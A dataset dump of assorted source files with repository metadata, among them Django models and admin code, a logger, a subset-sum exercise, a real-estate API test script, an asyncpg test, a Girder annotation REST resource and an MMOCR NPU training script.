    razaoSocial = models.CharField(max_length=128)
    def __str__(self):
        return '{}'.format(self.nome)
class Autor(Pessoa):
    """Author: a short curriculum plus the scientific papers they co-wrote."""
    curriculo = models.CharField(max_length=128)
    artigos = models.ManyToManyField('ArtigoCientifico')
    def __str__(self):
        return '{}'.format(self.nome)
class Evento(models.Model):
    """Event: identification, schedule, organizer and venue fields.

    NOTE(review): most optional fields use null=True with blank=False, which
    allows NULL in the DB but still requires a value in forms -- confirm.
    NOTE(review): ForeignKey without on_delete implies Django < 2.0.
    """
    nome = models.CharField(max_length=150)
    eventoPrincipal = models.CharField(max_length=128, null=True, blank=False)
    sigla = models.CharField(max_length=128, null=True, blank=False)
    dataEHoraDeInicio = models.DateTimeField(blank=True, null=True)
    palavrasChave = models.CharField(max_length=128, null=True, blank=False)
    logoTipo = models.CharField(max_length=128, null=True, blank=False)
    realizador = models.ForeignKey(Pessoa, null=True, blank=False)
    cidade = models.CharField(max_length=128)
    uf = models.CharField(max_length=128)
    endereco = models.CharField(max_length=128, null=True, blank=False)
    cep = models.CharField(max_length=128, null=True, blank=False)
    def __str__(self):
        return '{}'.format(self.nome)
class EventoCientifico(Evento):
    """Scientific event: adds the ISSN of the proceedings."""
    issn = models.CharField(max_length=128)
    def __str__(self):
        return '{}'.format(self.nome)
class ArtigoCientifico(models.Model):
    """Scientific paper: title, authors and the event it was presented at."""
    titulo = models.CharField(max_length=128)
    autores = models.ManyToManyField('Autor')
    evento = models.ForeignKey(EventoCientifico, null=True, blank=False)  # NOTE(review): no on_delete => Django < 2.0
    def __str__(self):
        return '{}'.format(self.titulo)
"lucas.pires100.la@gmail.com"
] | lucas.pires100.la@gmail.com |
dce98cca1fcd4e0ddd6d4fa4399422fe437fba37 | 9da37920bec0710a594bf0c426216894cabfc8d7 | /log_handler.py | f8fdbc7b9ff19fdc4222eea64a4c8aa3a817c87e | [] | no_license | nathansikora/CamDuino | 54875870073b22a6a5fbc566b4914c1bbfbbde7f | 9b9f62cea4714f34e1c1f406dec5314bc22f2651 | refs/heads/main | 2023-06-05T03:17:52.207525 | 2021-06-30T18:17:06 | 2021-06-30T18:17:06 | 320,819,375 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 358 | py | from time import asctime
LOG_FILE = 'log.txt'        # default log destination, relative to the CWD
IS_LOG_TO_FILE = True       # default: also append each message to LOG_FILE
LOG_STR = '{0} : {1}\n'     # rendered as "<asctime> : <message>\n"
class Logger:
    """Minimal console logger that can mirror each message into a file."""

    @staticmethod
    def log(msg, path=LOG_FILE, is_log_to_file=IS_LOG_TO_FILE):
        """Print *msg* prefixed with a timestamp; append it to *path* when enabled."""
        stamped = LOG_STR.format(asctime(), msg)
        print(stamped)
        if not is_log_to_file:
            return
        with open(path, 'a') as log_file:
            log_file.write(stamped)
| [
"nathanikora@gmail.com"
] | nathanikora@gmail.com |
b78332e426db0c012566299a4099427eb04b134f | 9b87f57ca5934a3aaaaf40fb467a279c88c83da4 | /account/urls.py | ee4c841ef120ec4414ac1c0f027f53662358b558 | [] | no_license | TechlopersWork/techDjango | b3e1edb8a80239d0da0679728a075879e1349506 | b3dc2e11f25ab8983b35aa64a9ba76b0b7c1f09a | refs/heads/master | 2023-08-13T18:21:16.335711 | 2020-05-14T02:15:42 | 2020-05-14T02:15:42 | 263,793,558 | 0 | 0 | null | 2021-09-22T19:01:15 | 2020-05-14T02:20:13 | Python | UTF-8 | Python | false | false | 147 | py | from django.urls import path
from . import views
# Route table for the account app; the view callables come from ./views.py.
urlpatterns = [
    path('techlopian/', views.techlopian),
    path('clients/', views.client),
]
| [
"techloperswork@gmail.com"
] | techloperswork@gmail.com |
ead80ff7e262f85fb9e82c38864ce01ba505bf46 | f1d2332045791d155ac712169c51e3d0157a9040 | /dana/app_dana/admin.py | 0caa616abff9e8a625d6c0502f697a2c0aad8186 | [] | no_license | bulikkk/DanaPage | 97631d65fa83256b0853c483cf1bd08b4bfb4d0a | 316c048b51b769c65bea1ddf3bdcf61764d71cae | refs/heads/master | 2021-01-20T14:28:32.245003 | 2017-07-18T20:31:18 | 2017-07-18T20:31:18 | 90,613,361 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 345 | py | from django.contrib import admin
from .models import Banner, Project
# Register your models here.
@admin.register(Project)
class ProjectAdmin(admin.ModelAdmin):
    """Admin screen for Project: restrict the edit form to these fields."""
    fields = ('title', 'description', 'type', 'image', 'new')
@admin.register(Banner)
class BannerAdmin(admin.ModelAdmin):
    """Admin screen for Banner: restrict the edit form to these fields."""
    fields = ('title', 'time', 'no', 'image', 'active')
| [
"bulik.piotr@gmail.com"
] | bulik.piotr@gmail.com |
c9b5dc584f87539fc823344d500800f12cf0d1b8 | 21fe7a80b6dd30281bf045620723d6648150224f | /node_modules/mongoskin/node_modules/mongodb/node_modules/bson/build/config.gypi | b50bf85cfcefc7b35cb007ba470cbc796e955055 | [
"MIT",
"Apache-2.0"
] | permissive | artalgame/chat-node-js | cdc6fe98e9dddef79b588a35b692d278e790e5b1 | 3ad689f81149b2d817abc229fc600eb187bb6a43 | refs/heads/master | 2021-01-20T11:25:59.101449 | 2013-12-15T00:29:53 | 2013-12-15T00:29:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,455 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"gcc_version": 44,
"host_arch": "x64",
"node_install_npm": "true",
"node_prefix": "",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_unsafe_optimizations": 0,
"node_use_dtrace": "false",
"node_use_etw": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"node_use_systemtap": "false",
"python": "/usr/bin/python",
"target_arch": "x64",
"v8_enable_gdbjit": 0,
"v8_no_strict_aliasing": 1,
"v8_use_snapshot": "true",
"nodedir": "/var/lib/openshift/525ef577e0b8cd0ea20000db/app-root/data/.node-gyp/0.10.18",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"save_dev": "",
"viewer": "man",
"browser": "",
"rollback": "true",
"usage": "",
"globalignorefile": "/var/lib/stickshift/525ef577e0b8cd0ea20000db/app-root/data/etc/npmignore",
"shell": "/usr/bin/oo-trap-user",
"init_author_url": "",
"shrinkwrap": "true",
"parseable": "",
"userignorefile": "/var/lib/openshift/525ef577e0b8cd0ea20000db/app-root/data/.npmignore",
"sign_git_tag": "",
"init_author_email": "",
"cache_max": "null",
"long": "",
"ignore": "",
"npat": "",
"fetch_retries": "2",
"registry": "https://registry.npmjs.org/",
"versions": "",
"message": "%s",
"globalconfig": "/var/lib/stickshift/525ef577e0b8cd0ea20000db/app-root/data/etc/npmrc",
"always_auth": "",
"cache_lock_retries": "10",
"proprietary_attribs": "true",
"fetch_retry_mintimeout": "10000",
"json": "",
"coverage": "",
"pre": "",
"https_proxy": "",
"engine_strict": "",
"description": "true",
"userconfig": "/var/lib/openshift/525ef577e0b8cd0ea20000db/app-root/data/.npmrc",
"init_module": "/var/lib/openshift/525ef577e0b8cd0ea20000db/app-root/data/.npm-init.js",
"npaturl": "http://npat.npmjs.org/",
"user": "5149",
"node_version": "v0.10.18",
"save": "",
"editor": "vi",
"tag": "latest",
"global": "",
"username": "",
"optional": "true",
"force": "",
"bin_links": "true",
"searchopts": "",
"depth": "null",
"searchsort": "name",
"rebuild_bundle": "true",
"yes": "",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"strict_ssl": "true",
"group": "5149",
"fetch_retry_factor": "10",
"dev": "",
"version": "",
"cache_lock_stale": "60000",
"cache_min": "10",
"searchexclude": "",
"cache": "/var/lib/openshift/525ef577e0b8cd0ea20000db/app-root/data/.npm",
"color": "true",
"save_optional": "",
"user_agent": "node/v0.10.18 linux x64",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"umask": "18",
"init_version": "0.0.0",
"init_author_name": "",
"git": "/var/lib/stickshift/525ef577e0b8cd0ea20000db/app-root/data/bin/git",
"unsafe_perm": "true",
"tmp": "/tmp/",
"onload_script": "",
"link": "",
"prefix": "/var/lib/stickshift/525ef577e0b8cd0ea20000db/app-root/data"
}
}
| [
"artalgs@gmail.com"
] | artalgs@gmail.com |
67142483d36d0db80900abc7955171ba9822c98b | 68cd659b44f57adf266dd37789bd1da31f61670d | /swea/덧셈.py | e5b8ab0ac443bc65fe5936e0ac9141aab0492675 | [] | no_license | 01090841589/solved_problem | c0c6f5a46e4d48860dccb3b0288aa5b56868fbca | bbea2f31e5fe36cad100bc514eacd83545fb25b1 | refs/heads/master | 2023-07-02T23:55:51.631478 | 2021-08-04T13:57:00 | 2021-08-04T13:57:00 | 197,157,830 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 425 | py |
def summ(k, scr):
    """Depth-first search over subsets of the module-level ``arr`` starting at
    index *k* with running sum *scr*; prints the 1-based indices of every
    subset whose elements add up to the module-level target ``num``."""
    if scr == num:
        # visited[idx] is truthy exactly for the indices currently included
        print([idx + 1 for idx in range(N) if visited[idx]])
        return
    if scr > num or k >= N:
        return  # overshot the target, or ran out of elements
    # branch 1: include arr[k] ...
    visited[k] = arr[k]
    summ(k + 1, scr + arr[k])
    # ... branch 2: exclude it
    visited[k] = 0
    summ(k + 1, scr)
arr = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]   # candidate elements
N = len(arr)
num = 10                                # target subset sum
visited = [0] * N                       # visited[i] = arr[i] while i is in the current subset, else 0
summ(0, 0)                              # enumerate and print every solution
"chanchanhwan@naver.com"
] | chanchanhwan@naver.com |
53f341d9c5602b342cdf23b6be69e940832f7e46 | dc150d7be2cc82a28aea96b963ea15c6dc146df1 | /app/readtest.py | fb90774bfeeec30bcbd2735885b7863d0c38005f | [] | no_license | pboavida/aztraproject | 2605884d53918d3066f58dfbafe7174a5c035bb2 | c4d59bba9d2e5d5d0b4f2ed676590022014aaea8 | refs/heads/master | 2021-01-08T20:57:38.536908 | 2020-02-21T13:04:31 | 2020-02-21T13:04:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,551 | py | import requests
import json
from os import getenv
# this file was created to test if all the data needed for the tables is obtainable from the api requests
#the data as obtained in the print statements below is not necessarily ready to be entered directly in the tables.
# some data needs to be parsed, such as the deposit (which is obtained as a string from the api but should be entered as a number on the tables
# or the phone numbers (or any other variables with multiple references) which should be cross-checked for consistency
base_url = 'https://immoscout-api-ji3l2ohvha-lz.a.run.app'
summary_url = '/get_summary'
page_url = '/get_list?page='
data_url = '/get_data?id='
get_summary = requests.get(base_url + summary_url,headers={"accept":"application/json","X-API-KEY":"dffbab93-44e9-41c2-bfff-6bab66c89b6c"})
if get_summary:
print('Success!')
else:
print('An error has occurred getting the data summary.')
total_pages = get_summary.json()["total_pages"]
total_adds = get_summary.json()["total_ads"]
i = 2
page_info = []
id_list = []
ad_list = []
temp_list = requests.get(base_url + page_url + str(i),headers={"accept": "application/json", "X-API-KEY": "dffbab93-44e9-41c2-bfff-6bab66c89b6c"})
if temp_list:
print(temp_list.json())
page_info.append(temp_list.json())
x = page_info[0]['ids'][2]
temp_data= requests.get(base_url + data_url + str(x),headers={"accept": "application/json", "X-API-KEY": "dffbab93-44e9-41c2-bfff-6bab66c89b6c"})
print('immoscout_id:=',temp_data.json()['expose.expose']['realEstate']['@id'])
if 'livingSpace' in temp_data.json()['expose.expose']['realEstate']:
print('area_sq_m:=', temp_data.json()['expose.expose']['realEstate']['livingSpace'])
print('cnt_rooms:=',temp_data.json()['expose.expose']['realEstate']['numberOfRooms'])
if 'numberOfFloors' in temp_data.json()['expose.expose']['realEstate']:
print('cnt_floors:=', temp_data.json()['expose.expose']['realEstate']['numberOfFloors'])
if 'floor' in temp_data.json()['expose.expose']['realEstate']:
print('floor:=', temp_data.json()['expose.expose']['realEstate']['floor'])
print('type=',temp_data.json()['expose.expose']['realEstate']['apartmentType'])
print('has_fitted_kitchen:=',temp_data.json()['expose.expose']['realEstate']['builtInKitchen'])
print('has_lift:=',temp_data.json()['expose.expose']['realEstate']['lift'])
print('has_balcony:=',temp_data.json()['expose.expose']['realEstate']['balcony'])
print('has_garden:=',temp_data.json()['expose.expose']['realEstate']['garden'])
print('has_guest_toilet:=',temp_data.json()['expose.expose']['realEstate']['guestToilet'])
print('is_barrier_free:=',temp_data.json()['expose.expose']['realEstate']['handicappedAccessible'])
if 'heatingType' in temp_data.json()['expose.expose']['realEstate']:
print('heating_type:=', temp_data.json()['expose.expose']['realEstate']['heatingType'])
if 'thermalCharacteristic' in temp_data.json()['expose.expose']['realEstate']:
print('thermal_characteristic:=', temp_data.json()['expose.expose']['realEstate']['thermalCharacteristic'])
if 'totalRent' in temp_data.json()['expose.expose']['realEstate']:
print('total_rent:=', temp_data.json()['expose.expose']['realEstate']['totalRent'])
print('calculatedTotalRent=', temp_data.json()['expose.expose']['realEstate']['calculatedTotalRent'])
print('base_rent:=', temp_data.json()['expose.expose']['realEstate']['baseRent'])
print('service_charge:=', temp_data.json()['expose.expose']['realEstate']['serviceCharge'])
if 'deposit' in temp_data.json()['expose.expose']['realEstate']:
print('deposit:=', temp_data.json()['expose.expose']['realEstate']['deposit'])
print('city:=', temp_data.json()['expose.expose']['realEstate']['address']['city'])
print('district:=', temp_data.json()['expose.expose']['realEstate']['address']['quarter'])
print('zip_code:=', temp_data.json()['expose.expose']['realEstate']['address']['postcode'])
if 'street' in temp_data.json()['expose.expose']['realEstate']['address']:
print('street:=', temp_data.json()['expose.expose']['realEstate']['address']['street'])
if 'houseNumber' in temp_data.json()['expose.expose']['realEstate']['address']:
print('house_number:=', temp_data.json()['expose.expose']['realEstate']['address']['houseNumber'])
if 'wgs84Coordinate' in temp_data.json()['expose.expose']['realEstate']['address']:
if 'longitude' in temp_data.json()['expose.expose']['realEstate']['address']['wgs84Coordinate']:
print('lng:=',
temp_data.json()['expose.expose']['realEstate']['address']['wgs84Coordinate']['longitude'])
if 'latitude' in temp_data.json()['expose.expose']['realEstate']['address']['wgs84Coordinate']:
print('lat:=',
temp_data.json()['expose.expose']['realEstate']['address']['wgs84Coordinate']['latitude'])
if 'company' in temp_data.json()['expose.expose']['contactDetails']:
print('company_name:=', temp_data.json()['expose.expose']['contactDetails']['company'])
if 'contact_firstname' in temp_data.json()['expose.expose']['contactDetails']:
print('contact_firstname:=', temp_data.json()['expose.expose']['contactDetails']['firstname'])
if 'lastname' in temp_data.json()['expose.expose']['contactDetails']:
print('contact_lastname:=', temp_data.json()['expose.expose']['contactDetails']['lastname'])
if 'salutation' in temp_data.json()['expose.expose']['contactDetails']:
print('salutation:=', temp_data.json()['expose.expose']['contactDetails']['salutation'])
if 'email' in temp_data.json()['expose.expose']['contactDetails']['email']:
print('email:=',temp_data.json()['expose.expose']['contactDetails']['email'])
print('phone_number:=',temp_data.json()['expose.expose']['contactDetails']['phoneNumberCountryCode'])
print('phone_number:=',temp_data.json()['expose.expose']['contactDetails']['phoneNumberAreaCode'])
print('phone_number:=',temp_data.json()['expose.expose']['contactDetails']['phoneNumberSubscriber'])
print('phone_number:=',temp_data.json()['expose.expose']['contactDetails']['phoneNumber'])
print('mobile_number:=',temp_data.json()['expose.expose']['contactDetails']['cellPhoneNumber'])
print('address_city:=',temp_data.json()['expose.expose']['contactDetails']['address']['city'])
print('address_street:=',temp_data.json()['expose.expose']['contactDetails']['address']['street'])
print('address_zip_code:=',temp_data.json()['expose.expose']['contactDetails']['address']['postcode'])
print('address_house_number:=',temp_data.json()['expose.expose']['contactDetails']['address']['houseNumber'])
| [
"pedrom2boavida@gmail.com"
] | pedrom2boavida@gmail.com |
c0a4781c6bcf405595b392c0498e6a3e26ee1b42 | fc3564bc78effa5daf09c582b21c8cbc79a68e4b | /leetcode/rotateRight.py | f59e78fc9598b054fcc113ba4d643cd71d4234cb | [] | no_license | TimiLikesJava/interview-prep | f567d79ff066aab31468405e5ee107641756ebad | a7071ebe89e173a95b3708265e3c95fb43f1fb19 | refs/heads/master | 2022-11-26T03:55:07.775927 | 2020-07-28T12:30:16 | 2020-07-28T12:30:16 | 271,274,307 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 906 | py | def rotateRight(self, head: ListNode, k: int) -> ListNode:
if(head is None):
return
if(k == 0):
return head
count = 0
curr = head
while curr is not None:
count += 1
curr = curr.next
if(count == 1):
return head
if(count == k):
return head
num = count - (k % count)
num = num - 1
point = head
for i in range(num):
point = point.next
temp = point.next
if(temp is None):
return head
point.next = None
if(temp.next is None):
temp.next = head
head = temp
return head
else:
ans = temp
while ans.next is not None:
ans = ans.next
ans.next = head
head = temp
return head
| [
"noreply@github.com"
] | noreply@github.com |
c37e90516146a963e73064dbae83398fa95b20e3 | 1d48ddd72477de7d9ad98eef61bdfb406859b31c | /04. asyncio/web_scraping/test_pg.py | 31752e74e37bf55d125a66ca1feeb9777c26d7ae | [] | no_license | alexshchegretsov/async_techniques | b68d27de58bc2393520eb080838b2c72d356d2f3 | 42118504a39ccbd0bebad4ed41eba4b5c2e3d5dd | refs/heads/master | 2020-12-04T06:40:34.712114 | 2020-01-06T20:59:58 | 2020-01-06T20:59:58 | 231,661,735 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 450 | py | # -*- coding: utf-8 -*-
import asyncio
import asyncpg
async def run():
# conn = await asyncpg.connect(user="async", password="Dexter89!", database="async_db", host="127.0.0.1", port="5432")
conn = await asyncpg.connect("postgresql://async:Dexter89!@localhost/async_db")
values = await conn.fetch("""select * from talks_headers""")
await conn.close()
print(values, len(values))
if __name__ == '__main__':
asyncio.run(run())
| [
"nydollz77@gmail.com"
] | nydollz77@gmail.com |
759c45def54042c121a663b109de8f3c61c67d6e | 8af2c447bdde781f8016608b7dab0b2a2d975354 | /server/dive_server/views_annotation.py | 1e8a9d0494ca33ec42e7661d78fa882f9f6b1029 | [
"Apache-2.0"
] | permissive | acproject/dive | b8f580bb62bc0eda9d3fb3a6e33c0fd9edb74cf0 | 224f8c8814d306fcaf1191b2bc08851904e64577 | refs/heads/main | 2023-08-11T01:57:00.605940 | 2021-10-05T16:25:03 | 2021-10-05T16:25:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,554 | py | from typing import List, Optional
from girder.api import access
from girder.api.describe import Description, autoDescribeRoute
from girder.api.rest import Resource, setContentDisposition
from girder.constants import AccessType, TokenScope
from girder.models.folder import Folder
from . import crud, crud_annotation
DatasetModelParam = {
'description': "dataset id",
'model': Folder,
'paramType': 'query',
'required': True,
}
class AnnotationResource(Resource):
"""RESTFul Annotation Resource"""
def __init__(self, resourceName):
super(AnnotationResource, self).__init__()
self.resourceName = resourceName
self.route("GET", (), self.get_annotations)
self.route("GET", ("export",), self.export)
self.route("PATCH", (), self.save_annotations)
@access.user
@autoDescribeRoute(
Description("Get annotations of a clip").modelParam(
"folderId", **DatasetModelParam, level=AccessType.READ
)
)
def get_annotations(self, folder):
return crud_annotation.get_annotations(folder)
@access.public(scope=TokenScope.DATA_READ, cookie=True)
@autoDescribeRoute(
Description("Export annotations of a clip into CSV format.")
.modelParam("folderId", **DatasetModelParam, level=AccessType.READ)
.param(
"excludeBelowThreshold",
"Exclude tracks with confidencePairs below set threshold",
paramType="query",
dataType="boolean",
default=False,
)
.jsonParam(
"typeFilter",
"List of track types to filter by",
paramType="query",
required=False,
default=None,
requireArray=True,
)
)
def export(self, folder, excludeBelowThreshold: bool, typeFilter: Optional[List[str]]):
crud.verify_dataset(folder)
filename, gen = crud.get_annotation_csv_generator(
folder,
self.getCurrentUser(),
excludeBelowThreshold=excludeBelowThreshold,
typeFilter=typeFilter,
)
setContentDisposition(filename)
return gen
@access.user
@autoDescribeRoute(
Description("")
.modelParam("folderId", **DatasetModelParam, level=AccessType.WRITE)
.jsonParam("tracks", "upsert and delete tracks", paramType="body", requireObject=True)
)
def save_annotations(self, folder, tracks):
return crud_annotation.save_annotations(folder, self.getCurrentUser(), tracks)
| [
"noreply@github.com"
] | noreply@github.com |
472e2678e5a33ac3ef0f0b99023128e995f69fe6 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/built-in/cv/detection/DBpp_ID4145_for_PyTorch/mmocr/apis/train.py | dd009ec1a6e189694585385e994c91ebbb28894e | [
"GPL-1.0-or-later",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 11,120 | py | # -*- coding: utf-8 -*-
# BSD 3-Clause License
#
# Copyright (c) 2017
# All rights reserved.
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ==========================================================================
# Copyright (c) OpenMMLab. All rights reserved.
import warnings
import mmcv
import numpy as np
import torch
import torch.distributed as dist
from torch_npu.contrib.module.deform_conv import ModulatedDeformConv
try:
import apex
from apex import amp
except ImportError:
print("Better speed can be achieved with apex installed from https://www.github.com/nvidia/apex.")
from mmcv.parallel import MMDataParallel, MMDistributedDataParallel
from mmcv.device.npu import NPUDataParallel, NPUDistributedDataParallel
from mmcv.runner import (DistSamplerSeedHook, EpochBasedRunner,
Fp16OptimizerHook, OptimizerHook, build_optimizer,
build_runner, get_dist_info)
from mmcv.ops.modulated_deform_conv import ModulatedDeformConv2dPack
from mmdet.core import DistEvalHook, EvalHook
from mmdet.datasets import build_dataloader, build_dataset
from mmocr import digit_version
from mmocr.apis.utils import (disable_text_recog_aug_test,
replace_image_to_tensor)
from mmocr.utils import get_root_logger
class ApexOptimizerHook(OptimizerHook):
def after_train_iter(self, runner):
runner.optimizer.zero_grad()
if self.detect_anomalous_params:
self.detect_anomalous_parameters(runner.outputs['loss'], runner)
with amp.scale_loss(runner.outputs['loss'], runner.optimizer) as scaled_loss:
scaled_loss.backward()
if self.grad_clip is not None:
grad_norm = self.clip_grads(runner.model.parameters())
if grad_norm is not None:
# Add grad norm to the logger
runner.log_buffer.update({'grad_norm': float(grad_norm)},
runner.outputs['num_samples'])
runner.optimizer.step()
def replace_layers(model):
for n, m in model.named_children():
if len(list(m.children())) > 0:
## compound module, go inside it
replace_layers(m)
if isinstance(m, ModulatedDeformConv2dPack):
## simple module
new = ModulatedDeformConv(m.in_channels, m.out_channels, m.kernel_size,
m.stride[0] if isinstance(m.stride, tuple) else m.stride,
m.padding[0] if isinstance(m.padding, tuple) else m.padding,
m.dilation[0] if isinstance(m.dilation, tuple) else m.dilation,
m.groups, m.deform_groups, m.bias)
try:
n = int(n)
model[n] = new
except:
setattr(model, n, new)
def train_detector(model,
dataset,
cfg,
distributed=False,
validate=False,
timestamp=None,
meta=None):
logger = get_root_logger(cfg.log_level)
# prepare data loaders
dataset = dataset if isinstance(dataset, (list, tuple)) else [dataset]
# step 1: give default values and override (if exist) from cfg.data
default_loader_cfg = {
**dict(
num_gpus=len(cfg.gpu_ids),
dist=distributed,
seed=cfg.get('seed'),
drop_last=False,
pin_memory=True,
persistent_workers=False),
**({} if torch.__version__ != 'parrots' else dict(
prefetch_num=2,
)),
}
# update overall dataloader(for train, val and test) setting
default_loader_cfg.update({
k: v
for k, v in cfg.data.items() if k not in [
'train', 'val', 'test', 'train_dataloader', 'val_dataloader',
'test_dataloader'
]
})
# step 2: cfg.data.train_dataloader has highest priority
train_loader_cfg = dict(default_loader_cfg,
**cfg.data.get('train_dataloader', {}))
data_loaders = [build_dataloader(ds, **train_loader_cfg) for ds in dataset]
replace_layers(model)
# put model on gpus
if distributed:
find_unused_parameters = cfg.get('find_unused_parameters', False)
# Sets the `find_unused_parameters` parameter in
# torch.nn.parallel.DistributedDataParallel
if torch.npu.is_available():
model = NPUDistributedDataParallel(
model.npu(),
device_ids=[torch.npu.current_device()],
broadcast_buffers=False,
find_unused_parameters=find_unused_parameters)
else:
model = MMDistributedDataParallel(
model.cuda(),
device_ids=[torch.cuda.current_device()],
broadcast_buffers=False,
find_unused_parameters=find_unused_parameters)
else:
if not torch.cuda.is_available():
assert digit_version(mmcv.__version__) >= digit_version('1.4.4'), \
'Please use MMCV >= 1.4.4 for CPU training!'
if torch.npu.is_available():
model = NPUDataParallel(model.npu(), device_ids=cfg.gpu_ids)
else:
model = MMDataParallel(model, device_ids=cfg.gpu_ids)
# build runner
if torch.npu.is_available():
optimizer = apex.optimizers.NpuFusedSGD(model.module.parameters(),
lr=cfg.optimizer['lr'],
momentum=cfg.optimizer['momentum'],
weight_decay=cfg.optimizer['weight_decay'])
model.module, optimizer = amp.initialize(model.module, optimizer,
opt_level='O1', loss_scale=32768,
combine_grad=True)
else:
optimizer = build_optimizer(model, cfg.optimizer)
if 'runner' not in cfg:
cfg.runner = {
'type': 'EpochBasedRunner',
'max_epochs': cfg.total_epochs
}
warnings.warn(
'config is now expected to have a `runner` section, '
'please set `runner` in your config.', UserWarning)
else:
if 'total_epochs' in cfg:
assert cfg.total_epochs == cfg.runner.max_epochs
runner = build_runner(
cfg.runner,
default_args=dict(
model=model,
optimizer=optimizer,
work_dir=cfg.work_dir,
logger=logger,
meta=meta))
# an ugly workaround to make .log and .log.json filenames the same
runner.timestamp = timestamp
# fp16 setting
fp16_cfg = cfg.get('fp16', None)
if fp16_cfg is not None:
optimizer_config = Fp16OptimizerHook(
**cfg.optimizer_config, **fp16_cfg, distributed=distributed)
else:
optimizer_config = ApexOptimizerHook(**cfg.optimizer_config)
# register hooks
runner.register_training_hooks(
cfg.lr_config,
optimizer_config,
cfg.checkpoint_config,
cfg.log_config,
cfg.get('momentum_config', None),
custom_hooks_config=cfg.get('custom_hooks', None))
if distributed:
if isinstance(runner, EpochBasedRunner):
runner.register_hook(DistSamplerSeedHook())
# register eval hooks
if validate:
val_samples_per_gpu = (cfg.data.get('val_dataloader', {})).get(
'samples_per_gpu', cfg.data.get('samples_per_gpu', 1))
if val_samples_per_gpu > 1:
# Support batch_size > 1 in test for text recognition
# by disable MultiRotateAugOCR since it is useless for most case
cfg = disable_text_recog_aug_test(cfg)
cfg = replace_image_to_tensor(cfg)
val_dataset = build_dataset(cfg.data.val, dict(test_mode=True))
val_loader_cfg = {
**default_loader_cfg,
**dict(shuffle=False, drop_last=False),
**cfg.data.get('val_dataloader', {}),
**dict(samples_per_gpu=val_samples_per_gpu)
}
val_dataloader = build_dataloader(val_dataset, **val_loader_cfg)
eval_cfg = cfg.get('evaluation', {})
eval_cfg['by_epoch'] = cfg.runner['type'] != 'IterBasedRunner'
eval_hook = DistEvalHook if distributed else EvalHook
runner.register_hook(eval_hook(val_dataloader, **eval_cfg))
if cfg.resume_from:
runner.resume(cfg.resume_from)
elif cfg.load_from:
runner.load_checkpoint(cfg.load_from)
runner.run(data_loaders, cfg.workflow)
def init_random_seed(seed=None, device='cuda'):
"""Initialize random seed. If the seed is None, it will be replaced by a
random number, and then broadcasted to all processes.
Args:
seed (int, Optional): The seed.
device (str): The device where the seed will be put on.
Returns:
int: Seed to be used.
"""
if seed is not None:
return seed
# Make sure all ranks share the same random seed to prevent
# some potential bugs. Please refer to
# https://github.com/open-mmlab/mmdetection/issues/6339
rank, world_size = get_dist_info()
seed = np.random.randint(2**31)
if world_size == 1:
return seed
if rank == 0:
random_num = torch.tensor(seed, dtype=torch.int32, device=device)
else:
random_num = torch.tensor(0, dtype=torch.int32, device=device)
dist.broadcast(random_num, src=0)
return random_num.item()
| [
"wangjiangben@huawei.com"
] | wangjiangben@huawei.com |
